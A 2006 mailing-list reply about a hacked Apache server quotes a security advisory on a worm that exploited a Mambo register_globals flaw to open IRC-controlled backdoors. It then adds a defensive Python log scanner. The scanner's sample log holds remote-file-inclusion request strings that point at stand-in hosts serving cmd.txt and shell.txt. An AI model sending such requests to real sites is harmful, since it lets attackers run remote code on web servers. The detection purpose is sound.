
Re: [Erlug] apache hackerato(?)

To: ERlug - Lista Pubblica <erlug@xxxxxxxxxxxxxx>
Subject: Re: [Erlug] apache hackerato(?)
From: Massimo Danieli <m.danieli@xxxxxxxxxxxx>
Date: Fri, 12 May 2006 00:12:09 +0200
On Thu, 2006-05-11 at 23:55 +0200, Filippo Biondi wrote:
> On Thu, 11/05/2006 at 20:54 +0200, Massimo Danieli wrote:
> 
> > > 1) How the heck did he manage to make my webserver perform that request?
> > > And to execute the file once it had been downloaded.
> > > Is it perhaps due to the action of another script?
> > 
> > Probably some software that allows code injection (a nice PHP forum,
> > by any chance, or Mambo?)
> 
> the second one you said



From: David Jacoby <security_at_outpost24.com>
Date: Mon, 05 Dec 2005 21:23:23 +0100

Outpost24 Public Security Note http://www.outpost24.com

[BACKGROUND]
Mambo is a dynamic portal engine and content management system. The software is written in PHP. A computer researcher who goes under the alias rgod released an exploit for the "register_globals" Emulation Layer Overwrite vulnerability, and just a few days after the vulnerability was released, increased attacks for this vulnerability were monitored; the increased traffic is due to a worm which is currently in the wild.

[DESCRIPTION]
Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search on Google for vulnerable targets. Once it infects a computer it will connect to a predetermined IRC server where the attackers will wait and have the possibility to gain access to the infected computer. The attackers may also perform various tasks such as:

* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan

On certain systems it will also download a perl script which will allow the attacker to create a backchannel and spawn a shell on the infected computer with the same privileges as the running webserver.

A detailed profile is available for Outpost24 members; for more information please visit our webpage at http://www.outpost24.com

[SOLUTION]
Download the latest version from the official Mambo homepage or download the specific patch for this vulnerability.
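The question in the thread ("how did my webserver end up making that request?") is usually answered by the access log: a register_globals emulation overwrite shows up as a query-string key that names a superglobal (`GLOBALS[...]`, `_REQUEST[...]`) and a parameter value that is a remote URL the PHP code then includes. The following log scanner is an added example, not code from the list or from Outpost24; the log lines, hosts and paths are constructed, and the config-variable name inside the `GLOBALS[...]` key is only an illustration of the key shape.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (TEST-NET addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [11/May/2006:20:31:07 +0200] "GET /index.php?option=com_content HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [11/May/2006:20:32:41 +0200] "GET /index.php?option=com_content&GLOBALS[mosConfig_absolute_path]=http://203.0.113.77/cmd.txt? HTTP/1.1" 200 512 "-" "lwp-trustworthy/2.0"
192.0.2.44 - - [11/May/2006:20:33:02 +0200] "GET /index.php?option=com_content&page=http%3A%2F%2F192.0.2.99%2Fshell.txt HTTP/1.1" 200 0 "-" "Mozilla/4.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query-string keys that try to overwrite PHP superglobals through register_globals emulation.
SUPERGLOBAL_KEY = re.compile(r'(?i)^(GLOBALS|_REQUEST|_GET|_POST|_COOKIE|_SERVER)\[')
# Parameter values that point at a remote file (remote include of attacker-hosted code).
REMOTE_URL = re.compile(r'(?i)^(https?|ftp)://')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (rule, key) findings for one request target, in query-string order."""
    findings = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        key, value = unquote(key), unquote(value)  # tolerate double encoding
        if SUPERGLOBAL_KEY.match(key):
            findings.append(("superglobal-overwrite", key))
        if REMOTE_URL.match(value):
            findings.append(("remote-url-param", key))
    return findings


def scan_log(text):
    """Scan a whole log; return (client ip, request target, findings) for each flagged request."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = suspicious_params(rec["target"])
        if findings:
            alerts.append((rec["ip"], rec["target"], findings))
    return alerts


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
```

A hit on either rule is worth correlating with outbound connections from the web server user (the fetch of the included file, and the IRC connection the advisory describes), since the request alone only shows the attempt, not whether the include succeeded.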

